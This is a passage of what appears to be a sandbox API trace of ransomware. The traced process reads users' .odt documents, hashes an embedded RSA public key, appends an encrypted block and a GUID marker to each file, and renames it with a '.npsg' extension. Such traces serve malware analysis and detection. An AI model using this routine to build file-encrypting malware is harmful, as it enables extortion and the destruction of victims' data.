Flags=0x0, Size=0x30) returned 0x33c1a38 [0246.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0246.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0246.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8ffe8 [0246.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89138 [0246.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b90030 [0246.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89150 [0246.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89180 [0246.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b891e0 [0246.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89198 [0246.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0246.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7b830 [0246.357] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7b830, Size=0x218) returned 0x3b90a38 [0246.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa00 [0246.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89180 | out: hHeap=0x620000) returned 1 [0246.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89198 | out: hHeap=0x620000) returned 1 [0246.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891e0 | out: hHeap=0x620000) returned 1 [0246.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0246.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa00 | out: hHeap=0x620000) returned 1 [0246.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b891e0 [0246.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0246.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89198 [0246.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0246.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b89180 [0246.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0246.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7fce8 [0246.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd518 [0246.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0246.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0246.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7fe00 [0246.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8660 [0246.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x33734f8 [0246.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7fce8 | out: hHeap=0x620000) returned 1 [0246.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89198 | out: hHeap=0x620000) returned 1 [0246.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0246.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89180 | out: hHeap=0x620000) returned 1 [0246.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0246.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0246.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891e0 | out: hHeap=0x620000) returned 1 [0246.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0246.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0246.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0246.358] GetCurrentThreadId () returned 0x5b4 [0246.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0246.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b8adc8 [0246.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c1920 [0246.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a110 [0246.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0246.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0246.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0246.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0246.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.359] GetCurrentThreadId () returned 0x5b4 [0246.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x64dd08 [0246.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0246.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0246.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0246.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c4ac0 [0246.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0246.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3384ae0 [0246.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0246.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b891e0 [0246.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0246.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0246.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0246.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0246.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0246.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0246.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0246.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0246.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89180 [0246.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0246.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0246.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0246.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0246.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0246.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0246.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0246.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89198 [0246.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0246.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0246.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0246.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89168 [0246.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0246.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b891f8 [0246.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0246.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0246.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0246.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b891c8 [0246.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0246.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b891b0 [0246.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0246.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89210 [0246.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891b0 | out: hHeap=0x620000) returned 1 [0246.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b891b0 [0246.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891c8 | out: hHeap=0x620000) returned 1 [0246.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0246.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0246.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0246.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0246.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd518 [0246.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89180 | out: hHeap=0x620000) returned 1 [0246.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89180 [0246.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0246.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90a38 [0246.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891e0 | out: hHeap=0x620000) returned 1 [0246.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7fce8 [0246.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89210 | out: hHeap=0x620000) returned 1 [0246.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x33e3b68 [0246.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0246.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7ff18 [0246.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0246.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b80030 [0246.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89180 | out: hHeap=0x620000) returned 1 [0246.362] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b947f8 [0246.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7fce8 | out: hHeap=0x620000) returned 1 [0246.362] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33a9510 [0246.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0246.362] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x311a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.362] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0246.362] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0246.362] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0246.362] CloseHandle (hObject=0x644) returned 1 [0246.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xf0) returned 0x33b8188 [0246.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8f0) returned 0x3b8ccd0 [0246.364] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\D0CsPE54nS\\lPmnkpeSvkzaZE.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\d0cspe54ns\\lpmnkpesvkzaze.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\D0CsPE54nS\\lPmnkpeSvkzaZE.odt.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\d0cspe54ns\\lpmnkpesvkzaze.odt.npsg")) returned 1 [0246.366] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x755fa70, ftCreationTime.dwHighDateTime=0x1d5b9fc, ftLastAccessTime.dwLowDateTime=0x135fddb0, ftLastAccessTime.dwHighDateTime=0x1d5b9fa, ftLastWriteTime.dwLowDateTime=0x135fddb0, ftLastWriteTime.dwHighDateTime=0x1d5b9fa, nFileSizeHigh=0x0, nFileSizeLow=0xa26a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R4FWFdb.odt", cAlternateFileName="")) returned 1 [0246.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11e) returned 0x6affc0 [0246.366] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\D0CsPE54nS\\R4FWFdb.odt") returned=".odt" [0246.366] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\D0CsPE54nS\\R4FWFdb.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\d0cspe54ns\\r4fwfdb.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0246.366] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=41578) returned 1 [0246.367] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39b0000 [0246.369] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xa244, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.369] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0246.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0246.371] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb70*=0xa26a, lpOverlapped=0x0) returned 1 [0246.372] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0246.372] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.372] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.372] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a110) returned 1 [0246.374] CryptCreateHash (in: hProv=0x67a110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0246.374] CryptHashData (hHash=0x33f0488, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0246.374] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0246.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0246.374] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0246.374] GetLastError () returned 0x0 [0246.374] CryptDestroyHash (hHash=0x33f0488) returned 1 [0246.374] CryptReleaseContext (hProv=0x67a110, dwFlags=0x0) returned 1 [0246.374] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0246.374] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0246.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0246.374] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0246.374] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7b830, Size=0x218) returned 0x3b90a38 [0246.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa00 [0246.375] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xa26a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.375] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0246.375] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0246.375] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0246.375] CloseHandle (hObject=0x644) returned 1 [0246.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3b8c8b0 [0246.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e0) returned 0x3b8ccd0 [0246.380] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\D0CsPE54nS\\R4FWFdb.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\d0cspe54ns\\r4fwfdb.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\D0CsPE54nS\\R4FWFdb.odt.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\d0cspe54ns\\r4fwfdb.odt.npsg")) returned 1 [0246.382] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x755fa70, ftCreationTime.dwHighDateTime=0x1d5b9fc, ftLastAccessTime.dwLowDateTime=0x135fddb0, ftLastAccessTime.dwHighDateTime=0x1d5b9fa, ftLastWriteTime.dwLowDateTime=0x135fddb0, ftLastWriteTime.dwHighDateTime=0x1d5b9fa, nFileSizeHigh=0x0, nFileSizeLow=0xa26a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R4FWFdb.odt", cAlternateFileName="")) returned 0 [0246.382] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0246.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0246.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8888 | out: hHeap=0x620000) returned 1 [0246.382] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0246.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8888 [0246.382] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0246.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.383] HeapFree (in: hHeap=0x620000, 